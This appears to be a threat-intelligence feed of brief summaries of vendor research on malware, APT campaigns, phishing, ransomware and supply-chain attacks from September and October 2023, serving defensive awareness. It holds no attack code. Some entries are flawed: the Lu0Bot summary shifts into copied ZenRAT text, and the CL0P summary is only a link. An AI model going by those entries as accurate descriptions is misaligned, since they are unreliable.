- Researchers from AnyRun have examined the Snake Keylogger. It is malware that steals information and was created in the.NET programming language. It was identified in November 2020 and goes by the names Snake, 404 Keylogger, and 404KeyLogger. The Snake Keylogger collects the victim’s saved passwords, clipboard contents, keystrokes, and screen shots, among other pieces of information.
Source:
https://any.run/cybersecurity-blog/analyzing-snake-keylogger/
—
- Intel Source:
- Cyble
- Intel Name:
- The_exploit_of_a_vulnerability_in_WinRAR
- Date of Scan:
- 2023-10-07
- Impact:
- LOW
- Summary:
- Cyble researchers observed a RAR archive file on October 3rd on VirusTotal. That file exploits a WinRAR vulnerability (CVE-2023-38831) that could be discovered through adult websites or fake adult sites. In this malware campaign, this vulnerability is targeting to deliver various malicious payloads to the victim’s system and aiming to infect them using various malware types, such as Apanyan Stealer, The Murk-Stealer, and AsyncRAT.
—
- Intel Source:
- eSentire
- Intel Name:
- Attacks_Involving_an_Adversary_in_the_Middle_Have_Increased
- Date of Scan:
- 2023-10-06
- Impact:
- LOW
- Summary:
- Researchers from eSentire have noticed an uptick in adversary-in-the-middle (AitM) phishing attacks since mid-September 2023. AitM phishing attacks use social engineering to trick end users into clicking on dangerous links in emails. Then, data is proxied or routed through infrastructure under the control of the attacker, which results in the theft of user credentials, including session cookies and Multi-Factor Authentication (MFA) codes that would allow access to various accounts. This access has been used to carry out Business Email Compromise (BEC) attacks.
Source:
https://www.esentire.com/security-advisories/increase-in-adversary-in-the-middle-phishing-attacks
—
- Intel Source:
- Nsfocus
- Intel Name:
- New_wave_of_Mirai_Botnet
- Date of Scan:
- 2023-10-06
- Impact:
- MEDIUM
- Summary:
- NSFOCUS threat hunting system observed a new botnet variant families tied to Mirai. These families are hailBot, kiraiBot and catDDoS and very active and already spreaded widely that is becoming as a threat. Through this article, we will disclose the technical details of these three new Mirai variants and the data monitored by the global threat hunting system.
—
- Intel Source:
- eSentire
- Intel Name:
- Examining_Uses_of_ProjFUD_Injector_and_HTML_Smuggling_to_Deploy_AsyncRAT
- Date of Scan:
- 2023-10-06
- Impact:
- LOW
- Summary:
- Researchers from eSentire have determined that the questioned VBS file is malicious. The code to retrieve AsyncRAT is located in this file. The user got a phishing email with an.htm file attached. This method, known as HTML smuggling, was previously used by malware strains including Qakbot and AsyncRAT.
—
- Intel Source:
- SOC Radar
- Intel Name:
- Diving_Deep_into_Dark_Pink_APT_Group
- Date of Scan:
- 2023-10-06
- Impact:
- LOW
- Summary:
- SOCRader researchers have delved into the intricate details of the Dark Pink APT Group, shedding light on their campaigns, targets, and the security measures one can adopt to safeguard against malicious endeavors.
Source:
https://socradar.io/apt-profile-dark-pink-apt-group/
—
- Intel Source:
- Sentinelone
- Intel Name:
- Analysis_of_LostTrust_Ransomware
- Date of Scan:
- 2023-10-06
- Impact:
- LOW
- Summary:
- The ransomwares have been examined by SentinelOne experts, who have provided a high-level technical breakdown of the areas where various ransomware families and their modes of operation coincide. In addition to analyzing LostTrust payload behavior, they contrast artifacts with those from the SFile and Mindware families.
—
- Intel Source:
- welivesecurity
- Intel Name:
- DinodasRAT_Hits_a_Governmental_Organization_in_Guyana
- Date of Scan:
- 2023-10-05
- Impact:
- MEDIUM
- Summary:
- As part of Operation Jacana, a cyber espionage operation, a government agency in Guyana has been attacked. The activity involved a spear-phishing attack that resulted in the deployment of a previously undocumented implant named DinodasRAT, which was built in C++. ESET discovered the activity in February 2023.
Source:
https://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/
—
- Intel Source:
- Talos
- Intel Name:
- The_distribute_of_Ransom_Knight_malware_by_Qakbot_actors
- Date of Scan:
- 2023-10-05
- Impact:
- MEDIUM
- Summary:
- Talos is confident that even the FBI seized Qakbot infrastructure down in August that the threat actors behind Qakbot are active and started a new campaign that was activated just before the takedown, distributing a variant of Cyclops/Ransom Knight ransomware along with the Remcos backdoor. Talos observedd this new activity by connecting the metadata in the LNK files used in the new campaign to the machines used in previous Qakbot campaigns.
Source:
https://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- A_cyber_espionage_campaign_with_use_of_a_variant_of_HyperBro_loader
- Date of Scan:
- 2023-10-05
- Impact:
- LOW
- Summary:
- EclecticIQ analysts detected a cyber espionage campaign. The threat actors used a HyperBro loader variant with a Taiwan Semiconductor Manufacturing (TSMC) coax. It targeted the semiconductor industry in Mandarin/Chinese speaking East Asian regions (Taiwan, Hong Kong, Singapore).
—
- Intel Source:
- ReversingLabs
- Intel Name:
- A_Typosquatting_Operation_Using_NPM_to_Distribute_r77_Rootkit
- Date of Scan:
- 2023-10-05
- Impact:
- LOW
- Summary:
- Researchers from ReversingLabs have discovered a fresh supply chain exploit that targets the npm platform. The “typosquatting” campaign first surfaced in August, pushing a malicious package called node-hide-console-windows that downloaded a Discord bot that made it easier to install the r77 open source rootkit.
Source:
https://www.reversinglabs.com/blog/r77-rootkit-typosquatting-npm-threat-research
—
- Intel Source:
- Trend Micro
- Intel Name:
- Exposing_Infection_Methods_Across_Supply_Chains_and_Codebases
- Date of Scan:
- 2023-10-05
- Impact:
- LOW
- Summary:
- Researchers from Trend Micro examined case studies in which threat actors copied legitimate GitHub repositories (such as Binance-trading-bot, Crypto-clipper, Telegram-mass-dm, USDT-Sweeper, Discord-boost-tool, and others written in Python 3), trojanized them, and infected them with malicious code while strategically stuffing their repository description sections with keywords to increase their visibility in GitHub searches.
—
- Intel Source:
- Cyble
- Intel Name:
- RMS_Phishing_campaign_comeback
- Date of Scan:
- 2023-10-04
- Impact:
- LOW
- Summary:
- Cyble Research team discovered a phishing campaign targeted at Russian users, where TAs formed phishing websites that duplicated popular apps like ExpressVPN, WeChat, and Skype. All these applications are not accessible in Russia due to nationwide restrictions.
Source:
https://cyble.com/blog/rms-tools-sneaky-comeback-phishing-campaign-mirroring-banned-applications/
—
- Intel Source:
- Checkmarx
- Intel Name:
- The_Emergence_of_Recurring_Python_Threat
- Date of Scan:
- 2023-10-04
- Impact:
- LOW
- Summary:
- Researchers from Checkmarx have seen that from the beginning of April 2023, an attacker has been continuously deploying hundreds of malicious packages under different usernames, racking up close to 75,000 downloads. With changes from plain-text to encryption, multilevel obfuscation, and secondary disassembly payloads, the attacker’s progression is clear.
Source:
https://checkmarx.com/blog/the-evolutionary-tale-of-a-persistent-python-threat/
—
- Intel Source:
- Domain Tools
- Intel Name:
- US_Postal_Service_Smishing_Campaign_analysis
- Date of Scan:
- 2023-10-04
- Impact:
- LOW
- Summary:
- Recently, there was an observation of a spike of phishing, smishing emails and text messages in campaigns targeting the US Postal Service (USPS) as an institution,
—
- Intel Source:
- Menlo Security
- Intel Name:
- EvilProxy_Phishing_Attack_Strikes_Indeed
- Date of Scan:
- 2023-10-04
- Impact:
- LOW
- Summary:
- Menlo Labs have discovered a phishing campaign that targets senior-level executives in a variety of businesses, but especially those in the banking and financial services, insurance, property management, and manufacturing sectors.
Source:
https://www.menlosecurity.com/blog/evilproxy-phishing-attack-strikes-indeed/
—
- Intel Source:
- Rapid7
- Intel Name:
- WS_FTP_Server_critical_vulnerabilities_in_the_wild
- Date of Scan:
- 2023-10-03
- Impact:
- MEDIUM
- Summary:
- First spotted two critical vulnerabilities was by Progress Software who published their advisory about it. Two of which are critical (CVE-2023-40044 and CVE-2023-42657). appears to be the .NET deserialization vulnerability (CVE-2023-40044) and confirmed that it is exploitable with a single HTTPS POST request and a pre-existing ysoserial.net gadget. As of September 30, Rapid7 has observed multiple instances of WS_FTP exploitation in the wild. and provided the details of this activity in the Observed Attacker Behavior section of their blog.
Source:
https://www.rapid7.com/blog/post/2023/09/29/etr-critical-vulnerabilities-in-ws_ftp-server/
—
- Intel Source:
- Fortinet
- Intel Name:
- A_discovery_of_several_malicious_packages_hidden_in_NPM
- Date of Scan:
- 2023-10-03
- Impact:
- MEDIUM
- Summary:
- Last couple months, the Fortinet team discovered several malicious packages hidden in NPM. These packages were discovered through various ecosystems e.g. PyPI, NPM. In this blog, we will look at some of these packages, grouping them based on similar styles of code or functions. Every NPM package that was discovered targets to steal sensitive data, such as system or user information, via a webhook or file-sharing link.
Source:
https://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm
—
- Intel Source:
- Zscaler
- Intel Name:
- A_new_Malware_threat_BunnyLoader
- Date of Scan:
- 2023-10-02
- Impact:
- LOW
- Summary:
- Zscaler threat reserachers observed a new Malware-as-a-Service “BunnyLoader”. It has been sold on various forums. BunnyLoader has many capabilities like downloading and executing a second-stage payload, stealing browser credentials and system information, and much more.
Source:
https://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service
—
- Intel Source:
- Cyble
- Intel Name:
- PurpleFox_campaign_resurfaces_again
- Date of Scan:
- 2023-10-02
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) came across a Word document file that spreads via spam email, employing an infection method for disseminating PurpleFox malware.
Source:
https://cyble.com/blog/purplefox-resurfaces-via-spam-emails-a-look-into-its-recent-campaign/
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_Murk_Stealer_an_open_source_stealer_details
- Date of Scan:
- 2023-10-02
- Impact:
- LOW
- Summary:
- Cyfirma shared a full analysis report of “The-Murk-Stealer;” an open-source stealer. Their report shows the details of “The-Murk-Stealer,” a malicious tool that can discreetly infiltrate systems to collect sensitive information.
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_CL0P_ransomware_group_recent_activity
- Date of Scan:
- 2023-09-30
- Impact:
- MEDIUM
- Summary:
- https://unit42.paloaltonetworks.com/cl0p-group-distributes-ransomware-data-with-torrents/
Source:
https://unit42.paloaltonetworks.com/cl0p-group-distributes-ransomware-data-with-torrents/
—
- Intel Source:
- Security Affairs
- Intel Name:
- Johnson_Controls_International_suffered_a_ransomware_attack
- Date of Scan:
- 2023-09-29
- Impact:
- MEDIUM
- Summary:
- Johnson Controls International had announced that they had a massive ransomware attack that encrypted many of the company devices, including VMware ESXi servers, impacting the company’s and its subsidiaries’ operations.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Ad_Serving_Malicious_Content_Inside_Bing_AI_Chatbot
- Date of Scan:
- 2023-09-29
- Impact:
- LOW
- Summary:
- Researchers from Malwarebytes have discovered a method through which consumers looking for software downloads can be persuaded to visit fraudulent websites and download malware straight from a Bing Chat chat.
—
- Intel Source:
- Trend Micro
- Intel Name:
- APT34_Launches_Phishing_Attack_With_New_Malware
- Date of Scan:
- 2023-09-29
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMicro have detected and tracked the advanced persistent threat (APT) APT34 group with a new malware version that is used in conjunction with a phishing scam that was comparable to the SideTwist backdoor virus. Following the campaign, the organization went after a victim in Saudi Arabia using a bogus license registration form created by an African government agency.
Source:
https://www.trendmicro.com/en_us/research/23/i/apt34-deploys-phishing-attack-with-new-malware.html
—
- Intel Source:
- Huntress
- Intel Name:
- Analyses_of_Netscaler_exploitation
- Date of Scan:
- 2023-09-29
- Impact:
- LOW
- Summary:
- Huntress duty on the daily basis is to perform a periodic threat hunting across monitored endpoints for a suspicious activity not previously identified through existing detections. Recently while monitoring their activity, Huntress researchers observed the starnge processes in several monitored environments. It reflected the reconnaissance activities with the adversary tradecraft: executing built-in commands such as whoami.exe, tasklist with various flags, ipconfig, and ping.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Analyzes_of_a_Lazarus_attack_on_employees_of_an_aerospace_company
- Date of Scan:
- 2023-09-29
- Impact:
- LOW
- Summary:
- ESET researchers have observed a Lazarus attack on an aerospace company in Spain and initiated several tools, most notably a publicly undocumented backdoor we named LightlessCan.
—
- Intel Source:
- ISC. SANS
- Intel Name:
- Sample_of_Infostealer_malware_that_is_in_the_wild
- Date of Scan:
- 2023-09-29
- Impact:
- LOW
- Summary:
- ISC.SANS researcher spotted and analyzed a new “Infostealer” malware in the wild. He is concerned how people are still Storing Passwords and if it is still In Plain Text files..
—
- Intel Source:
- Securelist
- Intel Name:
- Reports_on_new_malwares_and_loaders
- Date of Scan:
- 2023-09-29
- Impact:
- LOW
- Summary:
- Securelist published their report on new ASMCrypt malware (related to the DoubleFinger loader) and also published reports on new versions of the Lumma stealer and Zanubis Android banking trojan.
Source:
https://securelist.com/crimeware-report-asmcrypt-loader-lumma-stealer-zanubis-banker/110512/
—
- Intel Source:
- Cyber Geeks
- Intel Name:
- Diving_Deep_into_Brute_Ratel_C4_Payloads
- Date of Scan:
- 2023-09-28
- Impact:
- LOW
- Summary:
- An alternative to Cobalt Strike is the Red Team & Adversary Simulation program Brute Ratel C4. A technical investigation of a Brute Ratel badger/agent that doesn’t use all the most recent aspects of the framework has been presented by researchers.
Source:
https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads-part-2/
—
- Intel Source:
- Checkmarx
- Intel Name:
- Dependabot_carrying_malicious_code
- Date of Scan:
- 2023-09-28
- Impact:
- LOW
- Summary:
- Checkmarx recently observed that their scanners detected nontypical commits to hundreds of GitHub repositories and carrying malicious code. Those commit messages were made up by threat actors to appear as a Dependabot automated contribution in the commit history, an attempt to disguise the malicious activity.
Source:
https://checkmarx.com/blog/surprise-when-dependabot-contributes-malicious-code/
—
- Intel Source:
- Resecurity
- Intel Name:
- New_Move_of_Ransomware_Ransomed_vc_Operators
- Date of Scan:
- 2023-09-28
- Impact:
- LOW
- Summary:
- After recently happened data leak from Sony, the same ransomware syndicate Ransomed.vc mentioned about the new victim this time in face of the largest Japanese telecommunication giant NTT Docomo.
—
- Intel Source:
- Symantec
- Intel Name:
- Budworm_APT_Group_Attacks_Government_and_Telecoms_Organizations
- Date of Scan:
- 2023-09-28
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have discovered that the Budworm advanced persistent threat (APT) group is still actively developing its toolkit. Additionally, it was determined that Budworm was targeting an Asian government and a Middle Eastern telecom company with an upgraded version of one of its main tools.
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_stealer_called_Exela
- Date of Scan:
- 2023-09-28
- Impact:
- LOW
- Summary:
- Cyble researchers recently observed came across a new stealer called “Exela”. Exela is a Python-based open-source stealer that has a capability to steal a big range of sensitive information from compromised systems.
Source:
https://cyble.com/blog/exela-stealer-spotted-targeting-social-media-giants/
—
- Intel Source:
- Fortinet
- Intel Name:
- A_Spearphishing_Campaign_Exploits_the_Azerbaijan_Armenia_Conflict
- Date of Scan:
- 2023-09-28
- Impact:
- LOW
- Summary:
- Last month, FortiGuard Labs has spotted a malicious memo pretending it is from the president of a company in Azerbaijan and targeted the management teams of associated businesses. After clicking on this memo, it downloaded malware which meant to collect basic information from its targets. The memo is in HTML format and uses HTML smuggling to automatically deliver a password-protected archive.
—
- Intel Source:
- DR. Web
- Intel Name:
- Hackers_Exploiting_Openfire_Flaw_to_Encrypt_Servers
- Date of Scan:
- 2023-09-28
- Impact:
- LOW
- Summary:
- Openfire messaging servers have a high-severity vulnerability that hackers are actively using to install cryptominers and encrypt servers with ransomware. A popular Java-based open-source chat (XMPP) server called Openfire has been downloaded 9 million times and is frequently used for private, cross-platform chat communications.
—
- Intel Source:
- Group-IB
- Intel Name:
- ShadowSyndicate_a_new_RaaS_threat_actor
- Date of Scan:
- 2023-09-27
- Impact:
- MEDIUM
- Summary:
- Group-IB researchers have identified a threat actor dubbed ShadowSyndicate using the same Secure Shell (SSH) fingerprint on many servers. It is a threat actor that collaborates with other ransomware organizations and programs’ affiliates. ShadowSyndicate employs a “off-the-shelf” toolbox for its attacks, which includes the viruses Cobalt Strike, IcedID, and Sliver
—
- Intel Source:
- NSFOCUS
- Intel Name:
- AtlasCross_Hackers_Using_American_Red_Cross_as_Phishing_Lure
- Date of Scan:
- 2023-09-27
- Impact:
- LOW
- Summary:
- A new APT hacking outfit called AtlasCross has been identified by NSFOCUS researchers. AtlasCross targets organizations using phishing lures that pretend to be the American Red Cross in order to spread backdoor malware. They think that a new APT attacker, with a high level of technical proficiency and a careful assault mindset, is responsible for this new attack method. This time, phishing attack activity was observed as part of the attacker’s focused attack on particular targets and served as its primary method of in-domain penetration.
—
- Intel Source:
- ASEC
- Intel Name:
- Unmasking_the_Threat_Impersonating_the_National_Tax_Service
- Date of Scan:
- 2023-09-26
- Impact:
- MEDIUM
- Summary:
- AhnLab Security Emergency Response Center (ASEC) has identified a concerning threat involving deceptive LNK files posing as the National Tax Service. This threat primarily targets Korean users through email-based distribution. When executed, the LNK file triggers a series of actions, including downloading additional malicious files and compromising user information. Qasar RAT and Amadey malware have been identified as the ultimate payloads
—
- Intel Source:
- Any Run
- Intel Name:
- The_examination_of_Lu0Bot_malware_malicious_activity
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- Any.Run analysts caught some malicious activity tha trtiggered their interest. It was the sample is written in Node.js. While initially, it appeared to be a regular bot for DDOS attacks, it turned out to be a lot more complex. Researchers from Proofpoint have discovered a brand-new piece of malware dubbed ZenRAT that spreads through fake Bitwarden installation packages. The malware will divert users of other hosts to a safe website and primarily targets Windows users.
—
- Intel Source:
- Group-IB
- Intel Name:
- A_detection_of_cryptojacking_campaign_on_a_popular_educational_resource
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- Group-IB analysts team observed and provided deteils for a cryptojacking campaign on a popular educational resource using Group-IB Managed XDR.
—
- Intel Source:
- ASEC
- Intel Name:
- Unveiling_the_Installation_Process_of_Cryptocurrency_CoinMiners
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency Response Center (ASEC) has revealed the process of cryptocurrency CoinMiner installation on compromised systems. Threat actors employ PowerShell scripts, primarily “nodejssetup-js.exe,” to exploit system resources. Malicious behaviors include code decoding, process injection, and crypto mining. Detecting this threat relies on behavior detection via AhnLab EDR. vigilance, endpoint security, and detailed analysis are essential for defense against this evolving threat.
—
- Intel Source:
- Proofpoint
- Intel Name:
- A_New_Malware_Called_ZenRAT
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- Researchers from Proofpoint have discovered a brand-new piece of malware dubbed ZenRAT that spreads through fake Bitwarden installation packages. The malware will divert users of other hosts to a safe website and primarily targets Windows users.
Source:
https://www.proofpoint.com/us/blog/threat-insight/zenrat-malware-brings-more-chaos-calm
—
- Intel Source:
- Mandiant
- Intel Name:
- Ramps_Up_Its_Spying_Activities
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- Researchers from Mandiant have discovered that APT29’s activity and focus on Ukraine accelerated in the first half of 2023 as Kyiv began its counteroffensive, highlighting the SVR’s crucial role in gathering information on the current crucial stage of the war. As Kyiv began its counteroffensive in the first half of 2023, APT29’s operations accelerated and its focus on Ukraine intensified, underscoring the SVR’s crucial involvement in gathering intelligence about the current crucial stage of the war.
Source:
https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing
—
- Intel Source:
- Resecurity
- Intel Name:
- The_expansion_of_a_Smishing_Triad_attack
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- This month, “Smishing Triad” attack got expended their trace in the UAE. Resecurity researchers has identified domain names that closely resemble those used by the group in their previous campaigns. Threat actors registered the majority of these UAE-focused domains with Gname.com Pte. Ltd.,
—
- Intel Source:
- Recorded Future
- Intel Name:
- Chinese_Hackers_TAG_74_Targeting_Organizations_in_South_Korea
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- Recorded Future researchers have identified that a multi-year Chinese state-sponsored cyber espionage campaign has been observed targeting South Korean academic, political, and government organizations.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2023-0919.pdf
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- Ukraines_Military_Targeted_in_STARK_VORTEX_with_MerlinAgent_Malware
- Date of Scan:
- 2023-09-26
- Impact:
- LOW
- Summary:
- Securonix Threat Research has uncovered an ongoing cyber attack campaign, dubbed STARK#VORTEX, that is specifically targeting Ukraine’s military. Orchestrated by the threat group UAC-0154, this campaign utilizes sophisticated techniques to evade detection. The attackers use a Microsoft Help file with an embedded obfuscated JavaScript code as a lure document, disguised as a manual for Pilot-in-Command (PIC) Drones, to deliver the MerlinAgent malware. The PowerShell-based malware is heavily obfuscated and downloads a payload from a remote server, giving attackers full control over compromised systems.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Hackers_Using_Gelsemium_to_Attack_Asian_Government
- Date of Scan:
- 2023-09-25
- Impact:
- MEDIUM
- Summary:
- Researchers from Palo Alto have discovered that attacks on a Southeast Asian government that took place over the course of six months in 2022 and 2023 were carried out by a stealthy advanced persistent threat (APT) tracked as Gelsemium. It included a variety of uncommon tools and methods that the threat actor used to establish a covert presence and gather information on private IIS servers owned by a Southeast Asian government organization.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Mustang_Panda_Using_ShadowPad_and_TONESHELL_Variant
- Date of Scan:
- 2023-09-25
- Impact:
- MEDIUM
- Summary:
- The attackers carried out a cyberespionage campaign with the goal of acquiring confidential documents and information while establishing a tenacious and covert foothold. The activity, which took place between the second and third quarters of 2021 and 2023, used a variety of technologies to conduct reconnaissance, steal credentials, keep access, and carry out post-compromise actions.
Source:
https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/
—
- Intel Source:
- fortinet
- Intel Name:
- The_Retch_and_S_H_O_ransomware_overview
- Date of Scan:
- 2023-09-25
- Impact:
- LOW
- Summary:
- FortiGuard Labs collected data on new ransomware variants that attracted attention within their datasets and the OSINT community. This ransomware report from FortiGuard covered the Retch and S.H.O ransomware.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-retch-and-sho
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Deadglyph_on_Stealth_Falcon_in_Middle_East
- Date of Scan:
- 2023-09-25
- Impact:
- LOW
- Summary:
- Researchers from ESET have found Deadglyph, a powerful backdoor that the famed Stealth Falcon gang utilized for Middle Eastern espionage. With the use of a machine-specific key, the essential parts are encrypted. Additional modules obtained from its C&C server are used to implement conventional backdoor commands.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Alloy_Taurus_Aims_to_Remain_Unnoticed
- Date of Scan:
- 2023-09-25
- Impact:
- MEDIUM
- Summary:
- According to reports, the intrusion set connected to Alloy Taurus started in early 2022 and persisted until 2023, utilizing unusual tactics and evading security measures for long-term persistence and reconnaissance. These attacks, which take place in six waves, take advantage of security holes in Microsoft Exchange Servers to deploy web shells, which act as a conduit to deliver additional payloads, including two previously unidentified.NET backdoors called Zapoa and ReShell, which allow remote command execution and data collection.
Source:
https://unit42.paloaltonetworks.com/alloy-taurus-targets-se-asian-government/
—
- Intel Source:
- The DFIR Report
- Intel Name:
- From_ScreenConnect_to_Hive_Ransomware
- Date of Scan:
- 2023-09-25
- Impact:
- LOW
- Summary:
- Researchers from the DFIR Report have seen a threat actor use an RMM tool as their first point of access, which led to a slightly bungled Hive ransomware deployment. An executable file disguised as a legitimate document made up the initial payload. Researchers believe that this campaign was most likely sent as an email with a link that, when clicked, downloaded the executable.
Source:
https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/
—
- Intel Source:
- Saudiresta
- Intel Name:
- APT34_group_new_phishing_attack
- Date of Scan:
- 2023-09-23
- Impact:
- LOW
- Summary:
- The Iranian threat group APT34 has been observed with lunching a new phishing attack that used a variant of a backdoor called SideTwist. APT34, also known by the names Cobalt Gypsy, Hazel Sandstorm (formerly Europium), Helix Kitten, and OilRig, has a track record of targeting telecommunications, government, defense, oil and financial services verticals in the Middle East
—
- Intel Source:
- TrendMicro
- Intel Name:
- Analyzing_the_Turla_APT_Group_Activities
- Date of Scan:
- 2023-09-23
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have studied the Turla cyberespionage gang’s efforts throughout the years, paying particular attention to the key MITRE techniques and the accompanying IDs connected to the threat actor group.
Source:
https://www.trendmicro.com/en_us/research/23/i/examining-the-activities-of-the-turla-group.html
—
- Intel Source:
- Sentilone
- Intel Name:
- Targeting_Telcos_with_a_LuaJIT_Toolkit
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- A series of cyberattacks against telecommunicator providers in the Middle East, Western Europe, and the South Asian subcontinent have been linked to a hitherto unknown threat actor known as Sandman. It is noteworthy that the incursions use the just-in-time (JIT) LuaJIT compiler to deliver the unique LuaDream implant.
Source:
https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_Evil_Alliance_Between_GuLoader_And_Remcos
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- Remcos and GuLoader have a close relationship, according to Checkpoint researchers. Remcos is hard to employ for nefarious reasons because antivirus programs may quickly detect it. However, Remcos can get around antivirus defense by using GuLoader. During this investigation, they found that GuLoader is now marketed as a crypter that renders its payload completely immune to antivirus software on the same platform as Remcos and is implicitly sold under a different name.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Iranian_Nation_State_Actor_OilRig_Attacks_sraeli_Organizations
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- As part of two distinct campaigns planned by the Iranian nation-state actor known as OilRig in 2021 and 2022, Israeli organizations have been identified by ESET researchers as being targeted. Two previously known first-stage backdoors called Solar and Mango were used in the attacks, dubbed Outer Space and Juicy Mix, to gather sensitive data from popular browsers and the Windows Credential Manager.
—
- Intel Source:
- Checkpoint
- Intel Name:
- A_Banker_Server_Side_Components_Analysis
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- A recent campaign utilizing a new form of the BBTok banker and operating in Latin America was recently uncovered by Check Point researchers. In the study, we focus on recently identified infection chains that employ a special mix of Living off the Land Binaries (LOLBins).
—
- Intel Source:
- Cyble
- Intel Name:
- Drinik_Malware_Returns_to_Threaten_Indian_Taxpayers
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- Researchers from Cyble have noticed that the Drinik malware showed increased activity levels that were timed to coincide with the deadline for filing Indian income tax returns. Drinik malware’s most recent version includes a number of recently introduced features.
Source:
https://cyble.com/blog/indian-taxpayers-face-a-multifaceted-threat-with-drinik-malwares-return/
—
- Intel Source:
- McAfee
- Intel Name:
- Investigation_into_WinRAR_Vulnerability
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- McAfee researchers examined a sample that exploited the major RCE vulnerability CVE-2023-38831. It has to do with an RCE flaw in WinRAR prior to version 6.23. The problem arises because a ZIP archive could contain a harmless file (such a regular.JPG file) as well as a folder with the same name as the innocent file, and when you try to access just the harmless file, the contents of the folder (which might have executable information) are processed.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/exploring-winrar-vulnerability-cve-2023-38831/
—
- Intel Source:
- Bitsight
- Intel Name:
- Analysis_of_SmokeLoaders_Plugins
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- A well-known malware family with a history spanning more than ten years is called SmokeLoader. The primary function of this malware is to download and drop additional malware families. However, the owners of SmokeLoader also market plugins that give the primary module new features. These plugins give an affiliate the ability to gather a variety of information from compromised PCs, including emails, cookies, passwords, and browser data.
—
- Intel Source:
- Sonatype
- Intel Name:
- An_ongoing_campaign_on_the_npm_registry
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- The Sonatype research team tracked down a campaign on the npm registry that uses npm packages to retrieve and exfiltrate your Kubernetes configuration and SSH keys to an external server.
Source:
https://blog.sonatype.com/npm-packages-caught-exfiltrating-kubernetes-config-ssh-keys
—
- Intel Source:
- Secureworks
- Intel Name:
- Gold_Melody_Group_Selling_Compromised_Access_to_Ransomware_Attackers
- Date of Scan:
- 2023-09-21
- Impact:
- LOW
- Summary:
- Researchers at Secureworks have discovered that a financially motivated threat actor has been exposed as an initial access broker (IAB) who buys access to compromised businesses from other adversaries in order to launch follow-up attacks like ransomware. The e-crime group Gold Melody, also known as Prophet Spider (CrowdStrike) and UNC961 (Mandiant).
Source:
https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker
—
- Intel Source:
- Cado Security
- Intel Name:
- P2Pinfect_Botnet_Targeting_Redis_and_SSH_Services
- Date of Scan:
- 2023-09-21
- Impact:
- LOW
- Summary:
- According to Cado Security researchers, P2Pinfect compromises have been seen in China, the United States, Germany, the UK, Singapore, Hong Kong, and Japan. Since August 28, a new peer-to-peer botnet named P2Pinfect that targets the free source Redis and SSH services has apparently seen a remarkable 600-times rise in traffic, including a 12.3% increase over the previous week.
—
- Intel Source:
- ASEC
- Intel Name:
- Attack_on_MS_SQL_Servers_by_HiddenGh0st_Malware
- Date of Scan:
- 2023-09-21
- Impact:
- LOW
- Summary:
- Recently, ASEC researchers verified the spread of a Gh0st RAT variant that targets poorly managed MS-SQL servers and installs the Hidden rootkit. An open-source rootkit called Hidden, which is available to everyone on GitHub, has the capacity to protect processes and hide files, registry entries, and even itself.
—
- Intel Source:
- SOC Radar
- Intel Name:
- An_Overview_of_NoEscape_Ransomware
- Date of Scan:
- 2023-09-21
- Impact:
- MEDIUM
- Summary:
- As a Ransomware-as-a-Service (RaaS), NoEscape Ransomware first appeared in May 2023. At this time, NoEscape RaaS operators provide affiliates a complete platform that makes it simple to create and administer payloads specifically designed for both Windows and Linux operating systems. NoEscape is also known for its multi-extortion techniques, and it keeps a blog on the Tor network where it lists its victims openly and shows the data that has been exfiltrated from people who refuse to comply with their demands.
Source:
https://socradar.io/dark-web-profile-noescape-ransomware/
—
- Intel Source:
- CISA
- Intel Name:
- Advisory_on_Snatch_Ransomware
- Date of Scan:
- 2023-09-21
- Impact:
- MEDIUM
- Summary:
- FBI and CISA released joint Cybersecurity Advisory about Snatch Ransomware which shared IOCs, tactics, techniques, and procedures linked with the Snatch ransomware variant. Snatch threat actors are acting as a ransomware-as-a-service (RaaS) model and change their tactics according to current cybercriminal trends and successes of other ransomware operations.
—
- Intel Source:
